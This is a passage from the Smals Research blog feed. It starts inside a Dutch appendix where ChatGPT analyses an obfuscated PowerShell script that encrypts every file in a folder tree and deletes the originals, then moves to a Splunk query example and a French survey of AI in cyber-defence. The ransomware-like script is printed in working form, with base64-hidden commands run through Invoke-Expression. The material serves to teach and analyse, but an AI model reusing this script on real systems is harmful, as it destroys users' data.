$object2<span style="color: #795e00;">.LastWriteTime</span></code><br /><code>        <span style="color: #001080;">$f</span> = <span style="color: #001080;">$object2</span></code><br /><code>        <span style="color: #001080;">$dynCmd</span> = [<span style="color: #0000ff;">System.Text.Encoding</span>]::UTF8.GetString([<span style="color: #0000ff;">Convert</span>]::FromBase64String(<span style="color: #a31515;">"UmVtb3ZlLUl0ZW0gLVBhdGgg"</span>)) + <span style="color: #a31515;">"'</span><span style="color: #001080;">$f<span style="color: #a31515;">'"</span></span></code><br /><code>        <span style="color: #795e00;">Invoke-Expression</span> <span style="color: #001080;">$dynCmd</span></code><br /><code>        <span style="color: #af00db;">return</span> <span style="color: #a31515;">"Sortie:</span> <span style="color: #001080;">$output</span><span style="color: #a31515;">"</span>        </code><br /><code>    }</code><br /><code>    <span style="color: #af00db;">End</span> {</code><br /><code>        <span style="color: #001080;">$sha1</span><span style="color: #795e00;">.Dispose</span>()</code><br /><code>        <span style="color: #001080;">$sha2</span><span style="color: #795e00;">.Dispose</span>()</code><br /><code>    }</code><br /><code>}</code><br /><br /><code><span style="color: #001080;">$dynCmd</span> = [<span style="color: #0000ff;">System.Text.Encoding</span>]::UTF8.GetString([<span style="color: #0000ff;">Convert</span>]::FromBase64String(<span style="color: #a31515;">"R2V0LUNoaWxkSXRlbSAtUGF0aCAiQzpcTG9jYWxcY2hhdF9ncHRfcHNcdGVzdCIgLUZpbGUgLVJlY3Vyc2U="</span>))<br /></code><br /><code><span style="color: #795e00;">Invoke-Expression</span> <span style="color: #001080;">$dynCmd</span> | <span style="color: #795e00;">ForEach-Object</span> {</code><br /><code>    <span style="color: #001080;">$object</span> = <span style="color: #001080;">$_</span><span style="color: #795e00;">.FullName</span></code><br /><code>    Compute_SHA256 -salt <span style="color: #a31515;">"salty"</span> -object <span style="color: #001080;">$object</span></code><br /><code>}</code></pre>
</div>
<h2 class="wp-block-heading">Antwoord van ChatGPT</h2>
<p>Deze PowerShell-scriptfunctie, <strong>Compute_SHA256</strong>, lijkt de functionaliteit te hebben om bestanden op een bepaalde locatie te versleutelen met SHA256 en AES encryptie, en vervolgens de originele bestanden te verwijderen. Hier is een uitleg van de verschillende onderdelen van de functie:</p>
<ol class="wp-block-list">
<li><strong>Functieparameters</strong>: De functie vereist twee parameters: salt, een zoutwaarde die gebruikt wordt voor hashing, en object, een pad naar een bestand dat verwerkt moet worden.</li>
<li><strong>Initialisatie</strong>:
<ul class="wp-block-list">
<li>New-Object byte[] 16: Een array van 16 bytes wordt gecreëerd voor gebruik als initialisatievector (IV).</li>
<li>SHA256Managed: Een instance van SHA256 wordt gecreëerd voor hashing.</li>
<li>AesManaged: Een instance van AES wordt geïnitialiseerd met CBC-modus, padding op &#8216;Zeros&#8217;, een blokgrootte van 128 bits en een sleutellengte van 256 bits.</li>
<li>De IV wordt ingesteld met random bytes.</li>
</ul>
</li>
<li><strong>Verwerkingslogica</strong>:
<ul class="wp-block-list">
<li>De AES sleutel wordt ingesteld door de SHA256 hash van het zout.</li>
<li>Invoke-Expression: Wordt gebruikt om dynamisch commando&#8217;s uit te voeren die uit base64-gedecodeerde strings komen. Deze commando&#8217;s zijn:
<ul class="wp-block-list">
<li>Get-Item: Haalt het bestand op dat verwerkt moet worden.</li>
<li>ReadAllBytes: Leest alle bytes van het opgehaalde bestand.</li>
<li>WriteAllBytes: Schrijft de versleutelde bytes terug naar het bestand met een nieuwe extensie &#8220;.xxx&#8221;.</li>
<li>Remove-Item: Verwijdert het oorspronkelijke bestand.</li>
</ul>
</li>
<li>De bestandsnaam van het verwerkte object wordt gebruikt om de outputbestandsnaam op te stellen door er &#8220;.xxx&#8221; aan toe te voegen.</li>
<li>De bytes van het bestand worden versleuteld met de vooraf geconfigureerde AES-instellingen.</li>
<li>De lastige schrijf- en verwijdercommando&#8217;s zijn ingebouwd in de dynamische commando&#8217;s die uitgevoerd worden via Invoke-Expression.</li>
</ul>
</li>
<li><strong>Opschoning</strong>: Aan het einde van de functie worden de Dispose methoden aangeroepen op de hash- en encryptie-instanties om systeembronnen vrij te maken.</li>
<li><strong>Scriptuitvoering</strong>: Het script aan het eind haalt alle bestanden recursief op vanaf een bepaald pad en past de Compute_SHA256 functie toe op elk bestand met het zout &#8216;salty&#8217;.</li>
</ol>
<p>Deze code kan potentieel schadelijk zijn als deze zonder toezicht in een productieomgeving wordt uitgevoerd, omdat het effectief bestanden versleutelt en vervolgens de originelen verwijdert. Het lijkt op ransomware-achtig gedrag, afhankelijk van het daadwerkelijke gebruik en de intentie. Gebruik en implementatie van dergelijke scripts moet met uiterste voorzichtigheid gebeuren.</p>
<h2 class="wp-block-heading">Aanvullende vraag</h2>
<p>Waar zie je dat de originele bestanden worden verwijderd?</p>
<h2 class="wp-block-heading">Beantwoord door ChatGPT 4.0</h2>
<p>De originele bestanden worden verwijderd in het script door het volgende gedeelte van de code in de Process blok:</p>
<pre>$f = $object2 $dynCmd = [System.Text.Encoding]::UTF8.GetString([Convert]::FromBase64String("UmVtb3ZlLUl0ZW0gLVBhdGgg")) + "'$f'" Invoke-Expression $dynCmd</pre>
<p>Hier is wat er gebeurt in deze code:</p>
<ol class="wp-block-list">
<li><strong>Opslaan van het bestandsobject</strong>:<code> $f = $object2</code> slaat het bestandsobject op in <code>$f</code>. Dit object bevat de eigenschappen van het bestand dat verwerkt wordt, inclusief het volledige pad.</li>
<li><strong>Genereren van het verwijdercommando</strong>:
<ul class="wp-block-list">
<li><code>[System.Text.Encoding]::UTF8.GetString([Convert]::FromBase64String("UmVtb3ZlLUl0ZW0gLVBhdGgg"))</code> decodeert een base64-encoded string die vertaald wordt naar &#8220;Remove-Item -Path &#8220;.</li>
<li>Dit wordt dan samengevoegd met &#8216;<code>$f</code>&#8216; (het pad van het bestand) om het complete PowerShell-commando te vormen dat het bestand zal verwijderen.</li>
</ul>
</li>
<li><strong>Uitvoeren van het verwijdercommando</strong>: Invoke-Expression $dynCmd voert het samengestelde commando dynamisch uit, wat leidt tot het verwijderen van het bestand op het pad dat in $f is opgeslagen.</li>
</ol>
<p>Dit gedeelte van het script zorgt er dus voor dat na de versleuteling van het bestand, het originele bestand van de schijf wordt verwijderd. Dit gedrag is typisch voor scripts die gebruikt worden in data-archivering of beveiliging, maar kan ook schadelijk zijn indien misbruikt.</p>
<h1 class="wp-block-heading">Bijlage 2 – Analysescriptgeneratie</h1>
<p>Voorbeeld van het genereren van een zeer eenvoudig event log analysescript in Splunk&#8217;s SPL taal.</p>
<h2 class="wp-block-heading">Vraag</h2>
<p>Schrijf een Splunk script dat entries filtert waarvan het IP bronadres niet gereserveerd is en niet in België ligt en waarvan de bestemming een klasse A IP is dat begint met 10.</p>
<h2 class="wp-block-heading">Antwoord</h2>
<p>Om een Splunk zoekopdracht te schrijven die log entries filtert gebaseerd op IP-adres criteria met een specifieke geografische locatie (België), plus de eerder genoemde IP-voorwaarden, heb je aanvullende informatie over de geolocatie van IP-adressen nodig. Als je Splunk omgeving ingesteld is om IP-geolocatie te ondersteunen (vaak via een geolocatie lookup tabel of externe integratie), kunnen we een effectieve zoekopdracht schrijven die de geolocatie data integreert.</p>
<p>Hieronder vind je een voorbeeld van hoe zo&#8217;n zoekopdracht eruit zou kunnen zien. Deze zoekopdracht veronderstelt dat er velden zijn zoals src_ip voor het bron-IP-adres, dest_ip voor het bestemmings-IP-adres, en een veld (bijvoorbeeld src_country) dat het land van het bron-IP aangeeft. Je moet misschien de veldnamen aanpassen afhankelijk van jouw specifieke Splunk setup.</p>
<pre>index=&lt;jouw_index_naam&gt; sourcetype=&lt;jouw_sourcetype&gt; | iplocation src_ip | eval reserved_ip_list="10.0.0.0/8,172.16.0.0/12,192.168.0.0/16,127.0.0.0/8,169.254.0.0/16" | where NOT match(cidrmatch(reserved_ip_list, src_ip)) AND NOT src_country="Belgium" | where match(cidrmatch("10.0.0.0/8", dest_ip)) | table _time, src_ip, dest_ip, src_country, other_relevant_fields</pre>
<p>Uitleg van de Query</p>
<ol class="wp-block-list">
<li><strong>Index en Sourcetype</strong>: Specificeer je index en sourcetype die relevant zijn voor je data.</li>
<li><strong>IP Geolocatie</strong>: De iplocation commando voegt geolocatie-informatie toe aan elk event gebaseerd op het src_ip. Dit voegt velden zoals Country, City, etc., toe, afhankelijk van de nauwkeurigheid en de instellingen van je geolocatie database.</li>
<li><strong>Reserve IP-adressen</strong>: De lijst van gereserveerde IP-adressen wordt gedefinieerd en gebruikt om te controleren of het src_ip niet binnen deze gereserveerde ranges valt.</li>
<li><strong>Filter op Niet-Gereserveerde en Niet-Belgische Bron-IP&#8217;s</strong>: De where clausule wordt gebruikt om events te filteren waarbij het bron-IP-adres niet in de gereserveerde reeksen valt en niet uit België komt (src_country zou aangepast moeten worden aan jouw geolocatie veldnaam).</li>
<li><strong>Filter op Klasse A Bestemmings-IP&#8217;s</strong>: Een tweede where clausule filtert op bestemmings-IP&#8217;s die beginnen met .</li>
<li><strong>Resultatenweergave</strong>: De table commando geeft de resultaten weer in een tabelvorm met relevante velden zoals tijd, bron- en bestemmings-IP, land van het bron-IP en andere velden die belangrijk kunnen zijn voor je analyse.</li>
</ol>
<p>Deze zoekopdracht biedt een effectieve manier om netwerkverkeer te monitoren met een focus op specifieke geografische en netwerkcriteria. Afhankelijk van de exacte vereisten, kun je meer specifieke filters of analyses toevoegen, zoals statistieken over verkeersvolumes of gedetailleerde onderzoeken naar bepaalde soorten verkeer.</p>
<h1 class="wp-block-heading">Notes</h1>
<p><a href="#_ftnref1" name="_ftn1"><sup>1</sup></a>   <a href="https://cordis.europa.eu/project/id/700692" target="_blank" rel="noopener">https://cordis.europa.eu/project/id/700692</a></p>
<p><a href="#_ftnref2" name="_ftn2"><sup>2</sup></a>   Uit een systematische analyse van publicaties over het gebruik van AI voor OSINT blijkt dat cybersecurity bijna de helft van de onderzochte publicaties[7] uitmaakt.</p>
<p><a href="#_ftnref3" name="_ftn3"><sup>3</sup></a>   De auteurs geven een recall aan van 90%. In het algemeen wordt recall gedefinieerd door het aantal gevonden relevante documenten in verhouding tot het aantal relevante documenten in de database.</p>
<p><a href="#_ftnref4" name="_ftn4"></a> <a href="#_ref4">[4]</a> Het model maakt gebruik van statistieken om afwijkingen te detecteren (eenvoudig statistisch model, Markovketen en tijdreeksen).</p>
<p><a href="#_ftnref5" name="_ftn5"><sup>5</sup></a>   <a href="https://www.cloudflare.com/fr-fr/learning/security/glossary/what-is-lateral-movement/" target="_blank" rel="noopener">https://www.cloudflare.com/fr-fr/learning/security/glossary/what-is-lateral-movement/</a></p>
<p><a href="#_ftnref6" name="_ftn6"><sup>6</sup></a>   <a href="https://github.com/GreyDGL/PentestGPT" target="_blank" rel="noopener">https://github.com/GreyDGL/PentestGPT</a></p>
<p><a href="#_ftnref7" name="_ftn7"><sup>7</sup></a>   <a href="https://www.hackthebox.com/" target="_blank" rel="noopener">https://www.hackthebox.com/</a></p>
<p><a href="#_ftnref8" name="_ftn8"><sup>8</sup></a>   Stel dat in een log van een miljoen gebeurtenissen wordt geschat dat er 100 gebeurtenissen zijn die echt overeenkomen met een inbraak. Laten we ook veronderstellen dat een fabrikant ons een inbraakdetectiesysteem verkoopt met een gevoeligheid van 99,9%, d.w.z. een percentage van 0,1% fout-negatieve events die overeenkomen met echte inbraken, en met een specificiteit van ook 99,9%, d.w.z. een percentage van 0,1% fout-positieve events die niet overeenkomen met inbraken. Als de software van de fabrikant een alert signaleert, wat is dan de waarschijnlijkheid dat dit daadwerkelijk overeenkomt met een inbraak?</p>
<p>Instinctief zouden velen zeggen “99,9%”. Echter, als we <em><strong>I</strong></em> aantonen, de willekeurige variabele die overeenkomt met een inbraak, en de willekeurige variabele <em><strong>A</strong></em> met betrekking tot een alert, kunnen we de bovenstaande hypothesen als volgt herschrijven: Als <em><strong>P</strong></em>(<em><strong>I</strong></em>)=100/1.000.000, <em><strong>P</strong></em>(<em><strong>A</strong></em>│<em><strong>I</strong></em>)=0,999, en <em><strong>P</strong></em>(¬<em><strong>A</strong></em>│¬<em><strong>I</strong></em>)=0,999, wat is dan de waarde van <em><strong>P</strong></em>(<em><strong>I</strong></em>|<em><strong>A</strong></em>)? Het theorema van Bayes geeft ons: <em><strong>P</strong></em>(<em><strong>I</strong></em>│<em><strong>A</strong></em>)=<em><strong>P</strong></em>(<em><strong>I</strong></em>)⋅<em><strong>P</strong></em>(<em><strong>A</strong></em>|<em><strong>I</strong></em>)/<em><strong>P</strong></em>(<em><strong>A</strong></em>) met <em><strong>P</strong></em>(<em><strong>A</strong></em>)=<em><strong>P</strong></em>(<em><strong>I</strong></em>)⋅<em><strong>P</strong></em>(<em><strong>A</strong></em>│<em><strong>I</strong></em>)+<em><strong>P</strong></em>(¬<em><strong>I</strong></em>)⋅<em><strong>P</strong></em>(<em><strong>A</strong></em>|¬<em><strong>I</strong></em>) en <em><strong>P</strong></em>(<em><strong>A</strong></em>│¬<em><strong>I</strong></em>)=1−<em><strong>P</strong></em>(¬<em><strong>A</strong></em>│¬<em><strong>I</strong></em>)=0,001. Dit leidt tot een kans van 9,08% dat de gegeven alert daadwerkelijk een inbraak is, niet 99,9%!</p>
<p><a href="#_ftnref9" name="_ftn9"><sup>9</sup></a>   Een niet-parametrische methode voor het schatten van de kansdichtheid van een willekeurige variabele</p>
<p><a href="#_ftnref10" name="_ftn10"><sup>10</sup></a> <a href="https://www.paloaltonetworks.com/blog/security-operations/using-chatgpt-in-cortex-xsoar/" target="_blank" rel="noopener">https://www.paloaltonetworks.com/blog/security-operations/using-chatgpt-in-cortex-xsoar/</a></p>
<p><a href="#_ftnref11" name="_ftn11"><sup>11</sup></a> <a href="https://falconllm.tii.ae/" target="_blank" rel="noopener">https://falconllm.tii.ae/</a></p>
<p>_________________________<br data-rich-text-line-break="true" /><em>Dit is een ingezonden bijdrage van Fabien A. P. Petitcolas, IT-beveiligingsspecialist bij Smals Research. Dit artikel werd geschreven in eigen naam en neemt geen standpunt in namens Smals.</em></p>

]]></content:encoded>
					
		
		
			</item>
		<item>
		<title>L&#8217;IA défensive</title>
		<link>https://www.smalsresearch.be/lia-defensive/</link>
		
		<dc:creator><![CDATA[Fabien A. P. Petitcolas]]></dc:creator>
		<pubDate>Mon, 06 May 2024 09:00:00 +0000</pubDate>
				<category><![CDATA[[FR]]]></category>
		<category><![CDATA[Blog post]]></category>
		<category><![CDATA[Cybersecurity]]></category>
		<category><![CDATA[Machine Learning]]></category>
		<category><![CDATA[Security]]></category>
		<guid isPermaLink="false">/?p=20459</guid>

					<description><![CDATA[Dans le dernier article de cette série, après quelques considérations générales, nous passons en revue des domaines de la cyber-défense tirant partie ou pouvant tirer parti de l’IA tels que le renseignement sur les cyber-attaques, la détection et l’identification de cyber-attaques, ou encore la réponse à des incidents de cybersécurité.]]></description>
										<content:encoded><![CDATA[<p><em><a href="/defensieve-ai/">Nederlandstalige versie</a></em></p>
<p>Dans un <a href="/lia-en-cybersecurite/">premier article</a>, nous avons brièvement expliqué ce qui se cache derrière le terme « d’intelligence artificielle (IA) » en décrivant quelques techniques de base utilisées en cybersécurité. Dans un <a href="/lia-offensive/">deuxième article</a>, nous avons traité de l’utilisation de l’IA pour faciliter les attaques contre des systèmes informatiques. En particulier, nous avons détaillé comment l’IA pourrait modifier ou modifie déjà plusieurs vecteurs d’attaques.</p>
<p>Dans le dernier article de cette série, après quelques considérations générales, nous passons en revue des domaines de la cyber-défense tirant parti ou pouvant tirer parti de l’IA tels que le renseignement sur les cyber-attaques, la détection et l’identification de cyber-attaques, ou encore la réponse à des incidents de cybersécurité.</p>
<h1>Introduction</h1>
<p>Dès 2018, Schneier <a href="#_ref1">[1]</a> estimait que la cyber-défense allait bénéficier d’avantage des techniques d’IA que la cyber-offensive, car selon lui, la défense était dans une moins bonne position que l’attaque, précisément à cause de ses importants composants humains. De plus il prédisait que les adversaires allaient continuer d’améliorer leur stratégie d’attaque grâce à l’automatisation, de sorte que le seul moyen efficace d’atténuer ces attaques à la vitesse de la machine serait l’automatisation. C’est une thèse également défendue par Sarker et al. <a href="#_ref2">[2]</a> qui soutiennent que l’IA pourrait révolutionner le domaine de la cybersécurité, en offrant non seulement une <em>automatisation</em> des tâches à grande échelle, mais aussi en <em>aidant les experts humains</em> à mieux comprendre une situation et à prendre des décisions dans des scénarios réels.</p>
<p>La société Gartner s’attend quant à elle, à ce que l’IA contribue à une réduction de 30% du taux de faux positifs dans les tests d’applications et la détection de menaces avant 2027 <a href="#_ref3">[3]</a>. Les nouveaux outils récemment annoncés par des entreprises importantes du marché, dont CrowdStrike, pourraient en effet, selon Gartner aider à améliorer la productivité et les compétences des administrateurs. Les idées ne manquent pas, mais comme le soulignent les auteurs de la note de la société de conseil, les fonctionnalités de recherche et d’analyse existent déjà et la nouveauté réside essentiellement dans l’interactivité entre les analystes humains et la machine.</p>
<p>Taddeo et al. <a href="#_ref4">[4]</a> temporisent l’engouement pour l’IA dans la cyber-défense en faisant remarquer que placer sa <em>confiance</em> dans l’IA pour la robustesse, la résilience et la réponse des systèmes de cybersécurité n’est pas méritée et insistent qu’une forme de contrôle est nécessaire pour réduire les risques de sécurité. Les auteurs utilisent le terme de <em>confiance</em> dans son terme le plus pur&nbsp;: une décision de déléguer, sans forme de contrôle ou de surveillance, une acceptation d’un risque de dépendance. Ils pointent le manque de transparence de l’IA et l’évolution d’un système d’IA dans le temps comme des limites importantes et recommandent notamment une mise en œuvre « maison » pour les infrastructures nationales critiques et une surveillance permanente du système d’IA et de son évolution.</p>
<p>Dasgupta et al. <a href="#_ref5">[5]</a> ont passé en revue la plupart des publications récentes utilisant l’IA dans le domaine de la cybersécurité. Un point crucial reste selon eux la performance (en termes de vitesse de réaction, mais également de réduction du taux de faux-positifs et faux-négatifs) des outils de détection qui peut avoir des conséquences importantes sur le système où ils sont déployés.</p>
<p>Dans les sections suivantes nous regardons plus en détails différents domaines de la cyber-défense pouvant tirer parti de l’IA.</p>
<h1>Renseignement sur les cyber-attaques</h1>
<p>Le renseignement sur les cyber-menaces est le processus de collecte, d’analyse et de diffusion d’informations sur les cyber-menaces actuelles et émergentes, telles que les acteurs, les cibles, les techniques, les outils, etc. Ces renseignements peuvent aider les organisations à se défendre de manière proactive contre les cyber-attaques en fournissant des informations exploitables et opportunes aux équipes de sécurité.</p>
<p>De nos jours, le renseignement d’origine de sources ouvertes (ROSO – « <em>Open-Source Intelligence (OSINT)</em> ») est largement adopté par les gouvernements et les services de renseignement pour mener leurs enquêtes et lutter contre la cyber-criminalité <a href="#_ref6">[6]</a>. Le projet européen DiSIEM<a href="#_ftn1" name="_ftnref1"><sup>1</sup></a> avait pour premier objectif l’intégration de diverses sources de données ROSO dans les systèmes de gestion des informations et événements de sécurité (« <em>Security Information and Event Management (SIEM)</em> ») pour aider à réagir aux vulnérabilités récemment découvertes dans l’infrastructure ou même à prédire d’éventuelles menaces émergentes<a href="#_ftn2" name="_ftnref2"><sup>2</sup></a>.</p>
<p>En principe un modèle de langage massif (« <em>Large Language Models (LLM) </em>») entraîné sur de larges sources de données comme les forums web, les sites spécialisés sur les vulnérabilités et incidents, ou les réseaux sociaux, pourrait être utilisé afin de générer des rapports de renseignement sur les cyber-menaces. Les LLM pourraient donc être utilisés pour accéder plus rapidement à de la documentation technique, des renseignements d’intelligence provenant de sources spécialisées. Par exemple Sewak et al. <a href="#_ref8">[8]</a> affirment que les LLM peuvent automatiquement extraire, valider et résumer des informations provenant de diverses sources, telles que des rapports de menaces, de la littérature, des scripts, etc. Ils montrent notamment comment les LLM peuvent identifier les intentions malveillantes dans des scripts. Leur approche permettrait de découvrir plus de 90%<a href="#_ftn3" name="_ftnref3"><sup>3</sup></a> des scripts effectivement malveillants dans une tâche de détection.</p>
<h1>Détection et identification de cyber-attaques</h1>
<p>L’IA peut jouer un rôle dans la détection et l’identification des cyber-attaques en améliorant les systèmes de détection d’intrusions et de logiciels malveillants et en permettant de mieux gérer les alertes.</p>
<h2>Détection d’intrusions</h2>
<p>Selon le NIST <a href="#_ref9">[9]</a>, un système de détection d’intrusions (IDS) se réfère au « <em>processus de surveiller les événements se produisant dans un système informatique ou un réseau et de les analyser pour des signes d’incidents possibles</em>. » Bien que les premiers développements de tels systèmes se soient concentrés sur des approches par signature, en 1986, Denning publiait un modèle d’IDS <a href="#_ref10">[10]</a> basé sur la détection d’anomalies<a href="#_ftn4" name="_ftnref4"><sup>4</sup></a> qui constitue encore aujourd’hui la base de nombreux systèmes. L’avantage principal des méthodes basées sur la détection d’anomalies est que celles-ci peuvent détecter des types d’incidents qui n’ont pas déjà été vus. Aujourd’hui ce sont les méthodes d’apprentissage automatiques non-supervisées qui sont couramment utilisées pour la détection d’anomalies&nbsp;: l’activité sur le réseau est comparée avec une ligne de base pré-entraînée et normalisée qui présente le comportement normal, ce qui permet au système de détecter des activités malveillantes inconnues, contrairement aux méthodes par signature.</p>
<p>Une approche est d’entraîner un réseau de neurones artificiels à apprendre si un trafic réseau est normal ou correspond à une classe d’attaques. En pratique cela demande les étapes suivantes&nbsp;:</p>
<ol>
<li>Un expert collecte un ensemble de données contenant à la fois le trafic normal du réseau de communication et des attaques.</li>
<li>Sur une machine très puissante, un réseau de neurones est entraîné à classer la différence entre le trafic normal et le trafic d’attaque.</li>
<li>Une copie du modèle appris lors de l’étape précédente est transférée sur le système opérationnel de détection d’intrusion de l’organisation.</li>
<li>Le système de détection d’intrusions applique le modèle sur le trafic réseau observé.</li>
</ol>
<p>Les choix de méthodes d’apprentissage sont nombreux, mais selon Appruzzese et al. <a href="#_ref11">[11]</a>, les méthodes d’apprentissage non-supervisé sont particulièrement appréciées pour les systèmes de détection d’intrusion sur les réseaux de communication en raison de la difficulté et du coût d’obtenir des données étiquetées. Par ailleurs, selon ces auteurs, la supériorité des réseaux d’apprentissage profonds pour la détection d’intrusions, par rapport à d’autres techniques d’IA, n’est pas prouvée et la complexité et le coût de calcul supplémentaire ne justifient pas nécessairement leur adoption.</p>
<p>Voici quelques exemples d’utilisation de techniques non-supervisées utilisées pour la détection d’intrusions&nbsp;:</p>
<ul>
<li>Bohara et al. <a href="#_ref12">[12]</a> utilisent plusieurs techniques de détection d’anomalies et notamment l’analyse en composantes principales (« <em>Principal Component Analysis (PCA)</em>»), le partitionnement en <em>k</em>-moyennes, et la détection de valeurs aberrantes basée sur l’écart absolu médian afin de détecter des mouvements latéraux<a href="#_ftn5" name="_ftnref5"><sup>5</sup></a> sur un réseau. Ces auteurs atteignent un taux de vrais positifs (TPR) de 88.7% et un taux de faux positifs (FPR) de 14.1%.</li>
<li>Dans <a href="#_ref13">[13]</a>, les auteurs présentent une méthode pour générer automatiquement une liste grise d’hôtes externes qui ont une probabilité élevée d’être impliqués dans des activités de balisage malveillant par rapport à l’ensemble de tous les hôtes externes habituellement contactés par l’organisation protégée. Leur proposition s’appuie sur des techniques de regroupement appliquées aux flux de réseaux.</li>
<li>Afin d’adresser le problème de déséquilibre entre le nombre d’échantillons positifs et négatifs dans les journaux d’intrusion (très peu de trafic malveillant par rapport au trafic légitime), Yang et al. <a href="#_ref14">[14]</a> utilisent un réseau antagoniste génératif convolutif profond (« <em>Deep Convolutional Generative Adversarial Network (DCGAN) </em>») afin de construire un système de détection d’intrusion en temps réel. Le DCGAN maintient un équilibre entre échantillons positifs et négatifs en générant de nouvelles données synthétiques. Afin de permettre l’analyse en temp réel, les auteurs utilisent des unités récurrentes fermées (« <em>Gates Recurrent Units (GRU) </em>»), qui sont plus efficaces qu’un réseau récurrent à mémoire court et long terme (LSTM) car utilisant moins de paramètres. Le système atteint une exactitude de 99,73%.</li>
</ul>
<p>Enfin, les outils basés sur les modèles massifs de langage ont aussi commencé à faire leur apparition dans la détection d’intrusion. Par exemple, l’outil PentestGPT<a href="#_ftn6" name="_ftnref6"><sup>6</sup></a> est un outil de tests d’intrusions optimisés par des LLM (en l’occurrence ChatGPT-4) et permet l’automatisation du processus de test d’intrusion en guidant les testeurs dans l’opération globale et les opérations spécifiques. PentestGPT a été testé avec succès sur « <em>HackTheBox</em><a href="#_ftn7" name="_ftnref7"><sup>7</sup></a> » et à travers diverses compétitions de capture de drapeau (« <em>Capture the Flag (CTF)</em> ») de niveau facile ou moyen.</p>
<h2>Détection de logiciels malveillants</h2>
<p>L’apprentissage automatique peut être utilisé à la fois pour l’analyse statique et l’analyse dynamique des logiciels malveillants. Cependant l’analyse statique est sujette à des contournements relativement simples en modifiant l’exécutable sans changer la logique sous-jacente ou avec des variantes plus avancées (p. ex. polymorphisme) modifiant l’exécutable de manière automatique.</p>
<p>Les analyses dynamiques combinées avec un apprentissage automatique s’avèrent plus efficaces <a href="#_ref11">[11]</a>. Mais il existe plusieurs limites à l’applicabilité des dernières avancées universitaires dans le domaine de l’apprentissage automatique à la détection de logiciels malveillants <a href="#_ref15">[15]</a>, notamment :</p>
<ul>
<li>Mauvaise interprétation de la mesure de performance, en partie due à l’oubli de la fréquence de base – un biais cognitif lié aux lois statistiques<a href="#_ftn8" name="_ftnref8"><sup>8</sup></a>;</li>
<li>Les bases de données de tests sont souvent vieilles de plusieurs années et ne tiennent donc pas compte des nouvelles méthodes de contournement mises en œuvre par les adversaires, ni des nouvelles interfaces de programmation applicatives disponibles. Selon [16], un grand nombre de travaux récents concernant l’apprentissage fédéré pour la détection d’intrusions, utilisent encore des bases de données publiques créée avant 2017, et donc avec des attaques ne reflétant pas nécessairement les réseaux de communication actuels.</li>
</ul>
<h2>Gestion des alertes</h2>
<p>Le triage des alertes de sécurité est une tâche qui demande relativement beaucoup de temps, mais qui peut être accélérée en mettant des informations contextuelles à disposition des analystes afin que ceux-ci n’aient pas à passer d’un outil de journalisation ou d’analyse à l’autre afin de comprendre ce qui se passe. Par exemple : géolocalisation d’une adresse IP, nom de l’organisation contrôlant l’IP, âge du domaine, réputation d’une valeur de hachage d’un fichier, type de fichier correspondant, copie d’écran automatique d’une URL, informations sur l’hôte et son environnement, etc. Ces alertes pourraient aussi être enrichies directement par un LLM (p. ex. catégorisation, information issue des services de renseignement spécialisés, score de risque).</p>
<p>De plus des techniques d’apprentissage automatique peuvent être utilisées pour le filtrage, le triage, la priorisation et l’agrégation d’alertes, afin de faciliter le triage et la réponse aux incidents. Par exemple Su et al. <a href="#_ref17">[17]</a> proposent une méthode pour automatiser le filtrage des faux positifs en utilisant une estimation par noyau<a href="#_ftn9" name="_ftnref9"><sup>9</sup></a> (« <em>Kernel density estimation (KDE)</em> »). Selon les auteurs, celle-ci réduit jusqu’à 75% le temps nécessaire pour la vérification des alertes.</p>
<h1>Réponse à des incidents de cybersécurité</h1>
<p>La réponse aux incidents est un élément clé de la stratégie de cybersécurité d’une organisation. Une réponse bien orchestrée peut contribuer à atténuer les dommages causés par une violation de la sécurité ou une cyber-attaque. Cependant, la rapidité et la précision de ces réponses sont primordiales. Les LLM peuvent contribuer à accélérer et à rationaliser ces processus, en fournissant des réponses automatisées et même en aidant à élaborer des plans d’intervention en cas d’incident. L’une des caractéristiques de l’architecture de ces LLM est leur capacité à générer du texte naturel, basé sur le contexte. Elle peut être exploitée pour créer un assistant de réponse aux incidents alimenté par l’IA, capable de fournir des conseils immédiats pendant un incident et de documenter automatiquement les événements au fur et à mesure qu’ils se déroulent. Par exemple, PaloAlto XSOAR<a href="#_ftn10" name="_ftnref10"><sup>10</sup></a> utilise ChatGPT pour générer des guides permettant de gérer certaines attaques (voir Figure 1).</p>
<table class=" aligncenter" style="width: 80%; background-color: #a0a0a0; border-style: solid;" cellpadding="5">
<tbody>
<tr>
<td style="width: 655.33px;">
<p>Dear Analyst,</p>
<p>The following is an analysis for Incident No. #3332 by ChatGPT:</p>
<p><strong>1- Analysis (Incident Description):</strong></p>
<p>On Tuesday 2023-May-09 at 12:46:03 PM, a workstation with the hostname &#8220;testlab&#8221; was compromised through the MitreAttack technique of OS Credential Dumping by the Poseidon Group. The indicator of compromise, 31ebide7840a342fd468e558e5ab627bcb4c542a8fe01aec4d5ba01d539aOfc, has a malicious reputation.</p>
<p><strong>2- Impact Analysis:</strong></p>
<p>The compromised workstation may have granted the attacker access to sensitive information and credentials on the network, which could potentially lead to further attacks and data breaches. The Poseidon Group is a known advanced persistent threat (APT) group, and their attacks are often highly targeted and sophisticated, making it imperative to respond quickly and effectively to mitigate potential damage.</p>
<p><strong>3- Action or Recommendations:</strong></p>
<ol style="list-style-type: lower-alpha;">
<li>Isolate the compromised workstation: The first step in responding to a security incident is to isolate the compromised system from the network to prevent further damage or spread of the attack. The compromised workstation with the IP address 10.10.10.10 should be taken offline immediately to prevent the attacker from further accessing or exfiltrating sensitive information.</li>
<li>Conduct a forensic investigation: A thorough forensic investigation should be conducted to determine the extent of the damage and whether any other machines on the network have been compromised. The investigation should aim to identify the initial point of entry, the scope of the attack, and any data that may have been exfiltrated by the attacker.</li>
<li>Remediate and patch vulnerabilities: The investigation should identify any vulnerabilities or weaknesses in the security infrastructure that allowed the attack to take place and patch or remediate these as quickly as possible to prevent similar incidents from occurring in the future.</li>
<li>Deploy additional security measures: Additional security measures may need to be deployed to prevent further attacks by the Poseidon Group or other APT groups. This may include deploying intrusion detection and prevention systems, implementing Two-Factor Authentication (2FA), and training employees on how to identify and respond to potential security incidents.</li>
<li>Notify appropriate authorities: Depending on the sensitivity and nature of the data that may have been compromised, it may be necessary to notify appropriate authorities such as law enforcement or regulatory bodies.</li>
</ol>
<p>The company should review their incident response plan and determine the appropriate steps to take regarding notification and disclosure.</p>
<p>&#8212;<br />Your SOC Team<br />Cortex XSOAR</p>
</td>
</tr>
</tbody>
</table>
<p style="text-align: left;"><em>Figure 1 – Informations proposée par XSOAR pour gérer une réponse à un incident de sécurité (d’après <a href="#_ref18">[18]</a>).</em></p>
